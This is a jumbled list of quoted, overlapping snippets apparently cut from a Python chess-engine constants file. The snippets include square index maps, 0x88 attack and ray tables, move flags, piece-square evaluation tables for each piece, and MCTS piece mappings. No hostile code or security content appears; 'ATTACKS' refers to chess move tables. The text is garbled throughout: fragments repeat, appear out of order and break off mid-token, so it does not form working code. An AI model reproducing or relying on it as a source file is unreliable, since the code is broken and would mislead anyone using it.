"'w' EMPTY = -1 PAWN = 'p' KNIGHT = 'n' BISHOP = 'b'", "1, 'c8': 2, 'd8': 3, 'e8': 4, 'f8': 5, 'g8': 6, 'h8': 7,", "2.0, 1.5, 0.5, -3.0], [-3.0, 0.0, 1.5, 2.0, 2.0, 1.5, 0.0, -3.0], [-3.0,", "0, 0, 0, 24, 0, 0, 0, 0, 0,20, 0, 
0, 20,0, 0,", "1, 1, 1, 1, 1, 0, -1, -1, -1,-1, -1, -1, -1, 0,", "16, 0, 0, 15, 0, 0, 0, 0, 0, 0, 0, 0, 0,", "0, 0,20, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,20, 2,", "'KSIDE_CASTLE': 'k', 'QSIDE_CASTLE': 'q' } BITS = { 'NORMAL': 1, 'CAPTURE': 2, 'BIG_PAWN':", ": 2, 'b' : 3, 'r' : 4, 'q' : 5, 'k' :", "0.5, 0.5, 0.5, 0.5, 0.0, -0.5], [ 0.0, 0.0, 0.5, 0.5, 0.5, 0.5,", "[-17, -16, -15, 1, 17, 16, 15, -1] } MCTS_MAPPING = { 'p'", "2.0, 1.0, 1.0], [0.5, 0.5, 1.0, 2.5, 2.5, 1.0, 0.5, 0.5], [0.0, 0.0,", "-1], 'k': [-17, -16, -15, 1, 17, 16, 15, -1] } MCTS_MAPPING =", "ATTACKS = [ 20,0, 0, 0, 0, 0, 0, 24, 0, 0, 0,", "0, 17, 16, 15, 0, 0, 0, 0, 0, 0, 0, 1, 1,", "'QSIDE_CASTLE': 64 } RANK_1 = 7 RANK_2 = 6 RANK_3 = 5 RANK_4", "0, 0, 0, 0, 0,-15, 0, 0, 0, 0,-16, 0, 0, 0, 0,-17,", "0, 0, 0, 0, 17, 0, 16, 0, 15, 0, 0, 0, 0,", "16, 'b7': 17, 'c7': 18, 'd7': 19, 'e7': 20, 'f7': 21, 'g7': 22,", "0,-17, 0, 0, 0, 0,-15, 0, 0, 0, 0, 0,-16, 0, 0, 0,", "0, 15, 0, 0, 0, 0, 17, 0, 0, 0, 0, 16, 0,", "0, 0, 15, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,", "1' POSSIBLE_RESULTS = ['1-0', '0-1', '1/2-1/2', '*'] # Directions pawns can move: forward", "1 RANK_8 = 0 SQUARES = { 'a8': 0, 'b8': 1, 'c8': 2,", "3, 'e8': 4, 'f8': 5, 'g8': 6, 'h8': 7, 'a7': 16, 'b7': 17,", "50, 'd5': 51, 'e5': 52, 'f5': 53, 'g5': 54, 'h5': 55, 'a4': 64,", "0.0, 0.0, 0.0, 0.0, -1.0], [ -1.0, 0.0, 0.5, 1.0, 1.0, 0.5, 0.0,", "-2.0] ] KNIGHT_EVAL = [ [-5.0, -4.0, -3.0, -3.0, -3.0, -3.0, -4.0, -5.0],", "0, 16, 0, 0, 0, 15, 0, 0, 0, 0, 0, 0, 0,", "1.0, 0.5, 0.0, -1.0], [ -1.0, 0.5, 0.5, 1.0, 1.0, 0.5, 0.5, -1.0],", "0, 0, 24, 0, 0, 0, 0,20, 0, 0, 0, 0, 20,0, 0,", "-1.0, -1.0, -1.0, -1.0, -2.0], [ -1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,", "-3.0, -3.0, -4.0, -4.0, -3.0, -3.0, -2.0], [ -1.0, -2.0, -2.0, -2.0, -2.0,", "1.0, 1.0, 1.0, 0.5], [ -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5],", "0.0, 0.0, 0.0, 0.0, -0.5], [ -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,", "0, 0, 0, 0,-15,-16,-17, 0, 0, 0, 0, 0, 0, 0, 0, 0,", "0, 0, 0, 0, 0, 0,-15, 0, 0,-16, 0, 0,-17, 0, 0, 
0,", "0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2,53, 56,", "0, 0, 0, 0, 0, 2,53, 56, 53, 2, 0, 0, 0, 0,", "0, 0, 0, 24, 0, 0, 0, 0,20, 0, 0, 0, 0, 0,", "0, 0, 17, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0,", "16, 'KSIDE_CASTLE': 32, 'QSIDE_CASTLE': 64 } RANK_1 = 7 RANK_2 = 6 RANK_3", "0.5, 0.5, 0.5, 0.5, 0.0, -1.0], [ -1.0, 0.0, 0.5, 0.0, 0.0, 0.0,", "'d7': 19, 'e7': 20, 'f7': 21, 'g7': 22, 'h7': 23, 'a6': 32, 'b6':", "2.0, 3.0, 3.0, 2.0, 1.0, 1.0], [0.5, 0.5, 1.0, 2.5, 2.5, 1.0, 0.5,", "BITS['QSIDE_CASTLE']}, {'square': SQUARES['h1'], 'flag': BITS['KSIDE_CASTLE']}], 'b': [{'square': SQUARES['a8'], 'flag': BITS['QSIDE_CASTLE']}, {'square': SQUARES['h8'], 'flag':", "0, 0, 0, 0, 0, 0,-15, 0, 0, 0, 0,-16, 0, 0, 0,", "-0.5], [ -1.0, 0.5, 0.5, 0.5, 0.5, 0.5, 0.0, -1.0], [ -1.0, 0.0,", "[ 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [ 0.5, 1.0, 1.0,", "[ -3.0, -4.0, -4.0, -5.0, -5.0, -4.0, -4.0, -3.0], [ -3.0, -4.0, -4.0,", "0.0, 0.0], [5.0, 5.0, 5.0, 5.0, 5.0, 5.0, 5.0, 5.0], [1.0, 1.0, 2.0,", "-1.0, -1.0, -1.0, -2.0] ] KNIGHT_EVAL = [ [-5.0, -4.0, -3.0, -3.0, -3.0,", "-4.0, -3.0, -3.0, -3.0, -3.0, -4.0, -5.0] ] PAWN_EVAL = [ [0.0, 0.0,", "-4.0, -4.0, -5.0, -5.0, -4.0, -4.0, -3.0], [ -3.0, -4.0, -4.0, -5.0, -5.0,", "5 } FLAGS = { 'NORMAL': 'n', 'CAPTURE': 'c', 'BIG_PAWN': 'b', 'EP_CAPTURE': 'e',", "0, 0, 2,53, 56, 53, 2, 0, 0, 0, 0, 0, 0, 24,24,24,24,24,24,56,", "0, 0, 0, 0, 0, 24, 0, 0, 0, 0, 0, 0,20, 0,", "68, 'f4': 69, 'g4': 70, 'h4': 71, 'a3': 80, 'b3': 81, 'c3': 82,", "0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, -1,", "0, 0, 24, 0, 0, 0,20, 0, 0, 0, 0, 0, 0, 20,", "0, 0, 0,-17, 0, 0, 0, 0,-15, 0, 0, 0, 0, 0,-16, 0,", "-1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.0], [ -1.0, 0.0, 0.5, 0.5,", ": 1, 'b' : -1 } ATTACKS = [ 20,0, 0, 0, 0,", "0, -15, 0, 0, 0, 0, 0, 0,-16, 0, 0, 0, 0, 0,", "-3.0, -3.0, -4.0, -5.0] ] PAWN_EVAL = [ [0.0, 0.0, 0.0, 0.0, 0.0,", "0 SQUARES = { 'a8': 0, 'b8': 1, 'c8': 2, 'd8': 3, 'e8':", "0.0, -2.0, -4.0], [-3.0, 0.0, 1.0, 1.5, 1.5, 1.0, 0.0, -3.0], [-3.0, 0.5,", "BISHOP = 'b' ROOK 
= 'r' QUEEN = 'q' KING = 'k' SYMBOLS", "RANK_5 = 3 RANK_6 = 2 RANK_7 = 1 RANK_8 = 0 SQUARES", "move PIECE_OFFSETS = { 'n': [-18, -33, -31, -14, 18, 33, 31, 14],", "'*'] # Directions pawns can move: forward 1, forward 2, right (capture), left", "0, 0, 0, 0,-17, 0, 0, -15, 0, 0, 0, 0, 0, 0,-16,", "'e2': 100, 'f2': 101, 'g2': 102, 'h2': 103, 'a1': 112, 'b1': 113, 'c1':", "'NORMAL': 1, 'CAPTURE': 2, 'BIG_PAWN': 4, 'EP_CAPTURE': 8, 'PROMOTION': 16, 'KSIDE_CASTLE': 32, 'QSIDE_CASTLE':", "-5.0, -5.0, -4.0, -4.0, -3.0], [ -3.0, -4.0, -4.0, -5.0, -5.0, -4.0, -4.0,", "'q' } BITS = { 'NORMAL': 1, 'CAPTURE': 2, 'BIG_PAWN': 4, 'EP_CAPTURE': 8,", "0.0, 0.0, -0.5], [ 0.0, 0.0, 0.0, 0.5, 0.5, 0.0, 0.0, 0.0] ]", "0.0, 0.5, 0.5, 0.0, 0.0, 0.0] ] BISHOP_EVAL = [ [ -2.0, -1.0,", "-2.0, 0.0, 0.0, 0.0, 0.0, -2.0, -4.0], [-3.0, 0.0, 1.0, 1.5, 1.5, 1.0,", "'b3': 81, 'c3': 82, 'd3': 83, 'e3': 84, 'f3': 85, 'g3': 86, 'h3':", "1.0, 1.0, 1.0, 1.0, 1.0, 1.0, -1.0], [ -1.0, 0.5, 0.0, 0.0, 0.0,", "0.0, -2.0, -4.0], [-5.0, -4.0, -3.0, -3.0, -3.0, -3.0, -4.0, -5.0] ] PAWN_EVAL", "0, 0, 0, 0, 24, 0, 0, 0, 0,20, 0, 0, 0, 0,", "2,53, 56, 53, 2, 0, 0, 0, 0, 0, 0, 24,24,24,24,24,24,56, 0, 56,24,24,24,24,24,24,", "0, 0, 0, 0,20 ] RAYS = [ 17, 0, 0, 0, 0,", "0, 0, 0, 0,-15, 0, 0, 0,-16, 0, 0, 0,-17, 0, 0, 0,", "(capture), left (capture) PAWN_OFFSETS = { 'b': [16, 32, 17, 15], 'w': [-16,", "= 'n' BISHOP = 'b' ROOK = 'r' QUEEN = 'q' KING =", "0, 0, 15, 0, 0, 17, 0, 0, 0, 0, 0, 16, 0,", "= 0 SQUARES = { 'a8': 0, 'b8': 1, 'c8': 2, 'd8': 3,", "0.0, 0.0, 0.0], [ 0.5, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.5], [", "0, 0, 20,0, 0, 0, 0, 0, 0, 24, 0, 0, 0, 0,", "0, 0, 16, 0, 0, 0, 0, 0, 15, 0, 0, 0, 0,", "0.5, 0.5, 0.0, -1.0], [ -0.5, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -0.5],", "[ -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5], [ 0.0, 0.0, 0.0,", "0,-15, 0, 0, 0, 0,-16, 0, 0, 0, 0,-17, 0, 0, 0, 0,-15,", "2.5, 1.0, 0.5, 0.5], [0.0, 0.0, 0.0, 2.0, 2.0, 0.0, 0.0, 0.0], [0.5,", "0, 0, 24, 0, 0,20, 0, 0, 0, 0, 0, 0, 0, 0,", "-1.0, 
-1.0, -2.0] ] ROOK_EVAL = [ [ 0.0, 0.0, 0.0, 0.0, 0.0,", "'r' : 4, 'q' : 5, 'k' : 6, } MCTS_DECODER = {", "- 0 1' POSSIBLE_RESULTS = ['1-0', '0-1', '1/2-1/2', '*'] # Directions pawns can", "0.5, 0.0, 0.0, 0.0, 0.0, -1.0], [ -2.0, -1.0, -1.0, -0.5, -0.5, -1.0,", "0, 0, 0, 0, 0, 0, 15, 0, 0, 17, 0, 0, 0,", "0.5, -1.0], [ -2.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -2.0] ] KNIGHT_EVAL", "0.5, 0.5, 0.5, 0.5, 0.0, -0.5], [ -1.0, 0.5, 0.5, 0.5, 0.5, 0.5,", "16, 0, 0, 0, 0, 0, 15, 0, 0, 0, 0, 17, 0,", "0, 0, 0, 0,-15, 0, 0, 0, 0,-16, 0, 0, 0, 0,-17, 0,", "-1.0, -1.0, -0.5, -0.5, -1.0, -1.0, -2.0] ] ROOK_EVAL = [ [ 0.0,", "1.0, 0.0, -1.0], [ -1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, -1.0], [", "0.5, 0.5, 0.0, -0.5], [ 0.0, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -0.5],", "1, 'n' : 2, 'b' : 3, 'r' : 4, 'q' : 5,", "} MCTS_DECODER = { 1 : 'p', 2 : 'n', 3 : 'b',", "0, 0, 0, 0, 24, 0, 0, 0, 0, 0,20, 0, 0, 0,", "0.5], [ -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5], [ -0.5, 0.0,", "= [ [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [5.0, 5.0, 5.0,", "= 'rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1' POSSIBLE_RESULTS = ['1-0', '0-1', '1/2-1/2', '*']", "0, 0,20, 0, 0, 24, 0, 0,20, 0, 0, 0, 0, 0, 0,", "-1.0, 0.5, 0.5, 1.0, 1.0, 0.5, 0.5, -1.0], [ -1.0, 0.0, 1.0, 1.0,", "-1.0, 0.0, 0.0, -1.0, -0.5, 0.5], [0.5, 1.0, 1.0, -2.0, -2.0, 1.0, 1.0,", "} ATTACKS = [ 20,0, 0, 0, 0, 0, 0, 24, 0, 0,", "'r': 3, 'q': 4, 'k': 5 } FLAGS = { 'NORMAL': 'n', 'CAPTURE':", "[ [ -2.0, -1.0, -1.0, -0.5, -0.5, -1.0, -1.0, -2.0], [ -1.0, 0.0,", "'a8': 0, 'b8': 1, 'c8': 2, 'd8': 3, 'e8': 4, 'f8': 5, 'g8':", "BITS = { 'NORMAL': 1, 'CAPTURE': 2, 'BIG_PAWN': 4, 'EP_CAPTURE': 8, 'PROMOTION': 16,", "[-3.0, 0.0, 1.0, 1.5, 1.5, 1.0, 0.0, -3.0], [-3.0, 0.5, 1.5, 2.0, 2.0,", "-2.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -2.0] ] KNIGHT_EVAL = [ [-5.0,", "0, 2,53, 56, 53, 2, 0, 0, 0, 0, 0, 0, 0, 0,", "[ -1.0, -2.0, -2.0, -2.0, -2.0, -2.0, -2.0, -1.0], [ 2.0, 2.0, 0.0,", "-1.0, -2.0], [ -1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.0], [ 
-1.0,", "-4.0], [-5.0, -4.0, -3.0, -3.0, -3.0, -3.0, -4.0, -5.0] ] PAWN_EVAL = [", "15, 0, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 16,", "DEFAULT_POSITION = 'rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1' POSSIBLE_RESULTS = ['1-0', '0-1', '1/2-1/2',", "24, 0, 0,20, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,20,", "2.0, 1.5, 0.0, -3.0], [-3.0, 0.5, 1.0, 1.5, 1.5, 1.0, 0.5, -3.0], [-4.0,", "32, 17, 15], 'w': [-16, -32, -17, -15] } # Directions different pieces", "0, 0, 24, 0, 0, 0, 0, 0,20, 0, 0, 20,0, 0, 0,", "'h4': 71, 'a3': 80, 'b3': 81, 'c3': 82, 'd3': 83, 'e3': 84, 'f3':", "0, 0,20, 2, 24, 2,20, 0, 0, 0, 0, 0, 0, 0, 0,", "0, 0, 0, 0, 17, 0, 0, 0, 0, 16, 0, 0, 0,", "-1.0, -1.0, -1.0, -1.0, -1.0, -2.0] ] KNIGHT_EVAL = [ [-5.0, -4.0, -3.0,", "] ROOK_EVAL = [ [ 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],", "0.5], [0.0, 0.0, 0.0, 2.0, 2.0, 0.0, 0.0, 0.0], [0.5, -0.5, -1.0, 0.0,", "0 1' POSSIBLE_RESULTS = ['1-0', '0-1', '1/2-1/2', '*'] # Directions pawns can move:", "-1, -1, 0, 0, 0, 0, 0, 0, 0,-15,-16,-17, 0, 0, 0, 0,", "0, 0, 0, 0, 0,-15, 0, 0,-16, 0, 0,-17, 0, 0, 0, 0,", "24,24,24,24,24,24,56, 0, 56,24,24,24,24,24,24, 0, 0, 0, 0, 0, 0, 2,53, 56, 53, 2,", "'c5': 50, 'd5': 51, 'e5': 52, 'f5': 53, 'g5': 54, 'h5': 55, 'a4':", "-3.0], [-3.0, 0.5, 1.5, 2.0, 2.0, 1.5, 0.5, -3.0], [-3.0, 0.0, 1.5, 2.0,", "-2.0, -2.0, 1.0, 1.0, 0.5], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]", "'d2': 99, 'e2': 100, 'f2': 101, 'g2': 102, 'h2': 103, 'a1': 112, 'b1':", "[16, 32, 17, 15], 'w': [-16, -32, -17, -15] } # Directions different", "0.5, 1.5, 2.0, 2.0, 1.5, 0.5, -3.0], [-3.0, 0.0, 1.5, 2.0, 2.0, 1.5,", "0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-15, 0,-16, 0,-17, 0,", ": 'q', 6 : 'k' } MCTS_COLOR_MAP = { 'w' : 1, 'b'", "5.0, 5.0, 5.0, 5.0, 5.0, 5.0], [1.0, 1.0, 2.0, 3.0, 3.0, 2.0, 1.0,", "[-16, -32, -17, -15] } # Directions different pieces can move PIECE_OFFSETS =", "2, 'b' : 3, 'r' : 4, 'q' : 5, 'k' : 6,", "0, 0, 0, 0, 0, 0, 0, 0, 0, 0,20, 2, 24, 2,20,", "0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 16, 0, 0,", "-3.0, -4.0, 
-4.0, -5.0, -5.0, -4.0, -4.0, -3.0], [ -2.0, -3.0, -3.0, -4.0,", "{ 'b': [16, 32, 17, 15], 'w': [-16, -32, -17, -15] } #", "0, 17, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0,", "17, 15], 'w': [-16, -32, -17, -15] } # Directions different pieces can", "= [ [ -2.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -2.0], [ -1.0,", "55, 'a4': 64, 'b4': 65, 'c4': 66, 'd4': 67, 'e4': 68, 'f4': 69,", "0, 15, 0, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0,", "2, right (capture), left (capture) PAWN_OFFSETS = { 'b': [16, 32, 17, 15],", "different pieces can move PIECE_OFFSETS = { 'n': [-18, -33, -31, -14, 18,", "0, 0, 0,20, 0, 0, 20,0, 0, 0, 0, 0, 0, 24, 0,", "0.5, -1.0], [ -1.0, 0.0, 1.0, 1.0, 1.0, 1.0, 0.0, -1.0], [ -1.0,", "2.0, 0.0, 0.0, 0.0, 0.0, 2.0, 2.0 ], [ 2.0, 3.0, 1.0, 0.0,", "0, 0, 0,-16, 0, 0, 0,-17, 0, 0, 0, 0, 0, 0,-15, 0,", "'b6': 33, 'c6': 34, 'd6': 35, 'e6': 36, 'f6': 37, 'g6': 38, 'h6':", "0.0, -0.5], [ -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5], [ -0.5,", "0,20, 0, 0, 0, 0, 0, 0,20, 0, 0, 0, 24, 0, 0,", "0, 0, 0, 0, 2,53, 56, 53, 2, 0, 0, 0, 0, 0,", "0, 20, 0, 0, 0, 0, 24, 0, 0, 0, 0,20, 0, 0,", "SYMBOLS = 'pnbrqkPNBRQK' DEFAULT_POSITION = 'rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1' POSSIBLE_RESULTS =", "20, 0, 0, 0, 0, 24, 0, 0, 0, 0,20, 0, 0, 0,", "0, 0, 0, 0, 0, 0, 2,53, 56, 53, 2, 0, 0, 0,", "17, 0, 0, 0, 16, 0, 0, 0, 15, 0, 0, 0, 0,", "0, 17, 0, 0, 0, 16, 0, 0, 0, 15, 0, 0, 0,", "0, 0, 0, 0, 0, 24, 0, 0, 0, 0, 0, 0,20 ]", "0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 15, 0, 0,", "0.0, 1.0, 1.0, 1.0, 1.0, 0.0, -1.0], [ -1.0, 1.0, 1.0, 1.0, 1.0,", "-3.0], [-3.0, 0.0, 1.5, 2.0, 2.0, 1.5, 0.0, -3.0], [-3.0, 0.5, 1.0, 1.5,", "[-5.0, -4.0, -3.0, -3.0, -3.0, -3.0, -4.0, -5.0], [-4.0, -2.0, 0.0, 0.0, 0.0,", "15, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 16, 0,", "] ] QUEEN_EVAL = [ [ -2.0, -1.0, -1.0, -0.5, -0.5, -1.0, -1.0,", "BLACK = 'b' WHITE = 'w' EMPTY = -1 PAWN = 'p' KNIGHT", "-1.0, -1.0, -1.0, -1.0, -2.0] ] KNIGHT_EVAL = [ [-5.0, -4.0, -3.0, -3.0,", "'n': [-18, -33, -31, -14, 18, 33, 31, 14], 'b': 
[-17, -15, 17,", "0, 0, 0, 17, 0, 0, 16, 0, 0, 15, 0, 0, 0,", "####################################################### # BOARD CONSTANTS ####################################################### BLACK = 'b' WHITE = 'w' EMPTY =", "0, 0, 16, 0, 0, 0, 0, 15, 0, 0, 0, 0, 0,", "0.5, 0.0, 0.0, 0.0] ] BISHOP_EVAL = [ [ -2.0, -1.0, -1.0, -1.0,", "64, 'b4': 65, 'c4': 66, 'd4': 67, 'e4': 68, 'f4': 69, 'g4': 70,", "0.0, 0.0, 0.0, -1.0], [ -1.0, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -1.0],", "0,-15, 0,-16, 0,-17, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-15,", "0, 17, 0, 0, 0, 0, 16, 0, 0, 0, 0, 15, 0,", "116, 'f1': 117, 'g1': 118, 'h1': 119 } ROOKS = { 'w': [{'square':", "[ 2.0, 2.0, 0.0, 0.0, 0.0, 0.0, 2.0, 2.0 ], [ 2.0, 3.0,", "0.0, -1.0], [ -1.0, 0.0, 0.5, 1.0, 1.0, 0.5, 0.0, -1.0], [ -1.0,", "0, 0, 0, 15, 0, 0, 17, 0, 0, 0, 0, 0, 16,", "1.0, 1.0, 0.5, 0.0, -1.0], [ -1.0, 0.5, 0.5, 1.0, 1.0, 0.5, 0.5,", "0, 0, 0, 20, 0, 0, 0, 0, 24, 0, 0, 0, 0,20,", "0, 0,20, 0, 0, 0, 0, 20,0, 0, 0, 0, 0, 24, 0,", "1.0, 1.0, 1.0, 1.0, 0.0, -1.0], [ -1.0, 1.0, 1.0, 1.0, 1.0, 1.0,", "[-3.0, 0.0, 1.5, 2.0, 2.0, 1.5, 0.0, -3.0], [-3.0, 0.5, 1.0, 1.5, 1.5,", "0, 0,-16, 0, 0, 0,-17, 0, 0, 0, 0, 0, 0,-15, 0, 0,", "2.0, 0.0, 0.0, 0.0], [0.5, -0.5, -1.0, 0.0, 0.0, -1.0, -0.5, 0.5], [0.5,", "0, 0, 0, 16, 0, 0, 0, 0, 0, 15, 0, 0, 0,", "24, 2,20, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,20, 0,", "0,20, 2, 24, 2,20, 0, 0, 0, 0, 0, 0, 0, 0, 0,", "0, 0, 0, 24, 0, 0, 0, 0,20, 0, 0, 0, 0, 20,0,", "17, 15], 'r': [-16, 1, 16, -1], 'q': [-17, -16, -15, 1, 17,", ": 5, 'k' : 6, } MCTS_DECODER = { 1 : 'p', 2", "'n' BISHOP = 'b' ROOK = 'r' QUEEN = 'q' KING = 'k'", "0, 0, 0, 0, 0, 0,-15,-16,-17, 0, 0, 0, 0, 0, 0, 0,", "RANK_8 = 0 SQUARES = { 'a8': 0, 'b8': 1, 'c8': 2, 'd8':", "97, 'c2': 98, 'd2': 99, 'e2': 100, 'f2': 101, 'g2': 102, 'h2': 103,", "0.0, 0.0, 0.0, 0.0, -0.5], [ 0.0, 0.0, 0.0, 0.5, 0.5, 0.0, 0.0,", "[5.0, 5.0, 5.0, 5.0, 5.0, 5.0, 5.0, 5.0], [1.0, 1.0, 2.0, 3.0, 3.0,", "2.0, 2.0, 0.0, 0.0, 0.0], [0.5, -0.5, -1.0, 0.0, 0.0, -1.0, -0.5, 
0.5],", "-2.0, -2.0, -2.0, -2.0, -2.0, -1.0], [ 2.0, 2.0, 0.0, 0.0, 0.0, 0.0,", "0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 15, 0, 0,", "'b' WHITE = 'w' EMPTY = -1 PAWN = 'p' KNIGHT = 'n'", "[ 20,0, 0, 0, 0, 0, 0, 24, 0, 0, 0, 0, 0,", "0, 0, 0, 0, 0, 0, 0,-15, 0,-16, 0,-17, 0, 0, 0, 0,", "32, 'b6': 33, 'c6': 34, 'd6': 35, 'e6': 36, 'f6': 37, 'g6': 38,", "99, 'e2': 100, 'f2': 101, 'g2': 102, 'h2': 103, 'a1': 112, 'b1': 113,", "98, 'd2': 99, 'e2': 100, 'f2': 101, 'g2': 102, 'h2': 103, 'a1': 112,", "0, 0, 0, 0, 0, 0, 0, 0,-15, 0, 0, 0,-16, 0, 0,", "1, 1, 0, -1, -1, -1,-1, -1, -1, -1, 0, 0, 0, 0,", "'b' : -1 } ATTACKS = [ 20,0, 0, 0, 0, 0, 0,", "6 RANK_3 = 5 RANK_4 = 4 RANK_5 = 3 RANK_6 = 2", "'h5': 55, 'a4': 64, 'b4': 65, 'c4': 66, 'd4': 67, 'e4': 68, 'f4':", "0, 0, 0, 0,20, 0, 0, 0, 0, 20, 0, 0, 0, 0,", "0.5, 0.5, 0.5, 0.0, -1.0], [ -1.0, 0.0, 0.5, 0.0, 0.0, 0.0, 0.0,", "1.0, 1.0, 0.5], [ -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5], [", "0.0, 0.0], [0.5, -0.5, -1.0, 0.0, 0.0, -1.0, -0.5, 0.5], [0.5, 1.0, 1.0,", "6, } MCTS_DECODER = { 1 : 'p', 2 : 'n', 3 :", "20,0, 0, 0, 0, 0, 0, 24, 0, 0, 0, 0, 0, 0,20,", "0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2,53, 56, 53,", "17, 0, 16, 0, 15, 0, 0, 0, 0, 0, 0, 0, 0,", "0, 0, 17, 0, 0, 16, 0, 0, 15, 0, 0, 0, 0,", "'c', 'BIG_PAWN': 'b', 'EP_CAPTURE': 'e', 'PROMOTION': 'p', 'KSIDE_CASTLE': 'k', 'QSIDE_CASTLE': 'q' } BITS", "'r' QUEEN = 'q' KING = 'k' SYMBOLS = 'pnbrqkPNBRQK' DEFAULT_POSITION = 'rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR", "0, 0, 15, 0, 0, 0, 0, 0, 0, 0, 0, 17, 0,", "39, 'a5': 48, 'b5': 49, 'c5': 50, 'd5': 51, 'e5': 52, 'f5': 53,", "117, 'g1': 118, 'h1': 119 } ROOKS = { 'w': [{'square': SQUARES['a1'], 'flag':", "KNIGHT_EVAL = [ [-5.0, -4.0, -3.0, -3.0, -3.0, -3.0, -4.0, -5.0], [-4.0, -2.0,", "2, 0, 0, 0, 0, 0, 0, 24,24,24,24,24,24,56, 0, 56,24,24,24,24,24,24, 0, 0, 0,", "QUEEN = 'q' KING = 'k' SYMBOLS = 'pnbrqkPNBRQK' DEFAULT_POSITION = 'rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w", "1.0, 0.5, -3.0], [-4.0, -2.0, 0.0, 0.5, 0.5, 0.0, 
-2.0, -4.0], [-5.0, -4.0,", "8, 'PROMOTION': 16, 'KSIDE_CASTLE': 32, 'QSIDE_CASTLE': 64 } RANK_1 = 7 RANK_2 =", "'b1': 113, 'c1': 114, 'd1': 115, 'e1': 116, 'f1': 117, 'g1': 118, 'h1':", "[ -2.0, -1.0, -1.0, -0.5, -0.5, -1.0, -1.0, -2.0] ] ROOK_EVAL = [", "3.0, 2.0 ] ] QUEEN_EVAL = [ [ -2.0, -1.0, -1.0, -0.5, -0.5,", "0, 0, 17, 0, 0, 0, 16, 0, 0, 0, 15, 0, 0,", "0, 0, 0, 0,-15, 0, 0, 0, 0, 0,-16, 0, 0, 0, 0,", "5.0, 5.0, 5.0, 5.0, 5.0], [1.0, 1.0, 2.0, 3.0, 3.0, 2.0, 1.0, 1.0],", "[ [-5.0, -4.0, -3.0, -3.0, -3.0, -3.0, -4.0, -5.0], [-4.0, -2.0, 0.0, 0.0,", "2, 24, 2,20, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,20,", "2,53, 56, 53, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0,", "0, 0,20, 0, 0, 0, 0, 0, 0, 0, 0,20, 0, 0, 24,", "'d5': 51, 'e5': 52, 'f5': 53, 'g5': 54, 'h5': 55, 'a4': 64, 'b4':", "86, 'h3': 87, 'a2': 96, 'b2': 97, 'c2': 98, 'd2': 99, 'e2': 100,", "RANK_7 = 1 RANK_8 = 0 SQUARES = { 'a8': 0, 'b8': 1,", "0.0, 0.0, 0.0, -1.0], [ -2.0, -1.0, -1.0, -0.5, -0.5, -1.0, -1.0, -2.0]", "# Directions different pieces can move PIECE_OFFSETS = { 'n': [-18, -33, -31,", "= { 'w' : 1, 'b' : -1 } ATTACKS = [ 20,0,", "] BISHOP_EVAL = [ [ -2.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -2.0],", "-2.0, -2.0, -1.0], [ 2.0, 2.0, 0.0, 0.0, 0.0, 0.0, 2.0, 2.0 ],", "[ -1.0, 0.0, 0.5, 0.0, 0.0, 0.0, 0.0, -1.0], [ -2.0, -1.0, -1.0,", "'d6': 35, 'e6': 36, 'f6': 37, 'g6': 38, 'h6': 39, 'a5': 48, 'b5':", "move: forward 1, forward 2, right (capture), left (capture) PAWN_OFFSETS = { 'b':", "[ 17, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0,", "'BIG_PAWN': 'b', 'EP_CAPTURE': 'e', 'PROMOTION': 'p', 'KSIDE_CASTLE': 'k', 'QSIDE_CASTLE': 'q' } BITS =", "80, 'b3': 81, 'c3': 82, 'd3': 83, 'e3': 84, 'f3': 85, 'g3': 86,", "0, 16, 0, 0, 15, 0, 0, 0, 0, 0, 0, 0, 0,", "'h6': 39, 'a5': 48, 'b5': 49, 'c5': 50, 'd5': 51, 'e5': 52, 'f5':", "1.0, 0.5], [ -0.5, 0.0, 0.0, 